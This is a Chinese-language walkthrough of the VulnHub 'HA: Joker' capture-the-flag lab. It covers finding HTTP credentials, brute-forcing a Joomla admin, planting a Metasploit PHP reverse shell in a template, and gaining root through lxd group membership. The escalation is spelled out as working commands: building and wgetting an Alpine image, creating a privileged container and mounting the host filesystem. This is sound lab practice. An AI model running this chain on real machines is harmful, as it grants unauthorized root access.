vulnhub靶场之HA: Joker

难度：低级

该实验室将引入一些无政府状态。它将破坏既定的秩序，一切变成混乱。涂上你的脸，穿那套紫色的西装，因为是时候传达你内在的小丑了。这是一个boot2root实验。获得根标志是最终目标。
枚举是关键！！！！

查看页面源代码，发现大量注释。

没看过小丑的电影，不知道这些台词啥意思。
访问8080端口，发现需要http认证。我怀疑账号密码需要在这些注释里找线索，
在这里浪费的大量时间。
做不出来 直接看了writeup:
https://www.cnblogs.com/hack404/p/11726118.html
这里http认证的账号密码是
joker hannah
不看答案真破解不出来，我的字典里没有hannah.

后台是一个joomla管理系统，在这里爆破了用户名和密码
账号joomla joomla

修改模板index.php为msf的 phpshell。

成功反弹上线。

id查看
发现是lxd组的成员。
利用lxd提权

开启centos。
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
Python2 -c SimpleHTTPServer


wget http://192.168.0.106:8000/alpine-v3.11-x86_64-20200215_1651.tar.gz
lxc image import ./alpine-v3.11-x86_64-20200215_1651.tar.gz --alias myimage
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

Cd /mnt/root/root
Cat final.txt
拿到flag

关于lxd提权可以看这两篇文章
https://www.freebuf.com/articles/system/216803.html
https://www.anquanke.com/post/id/179407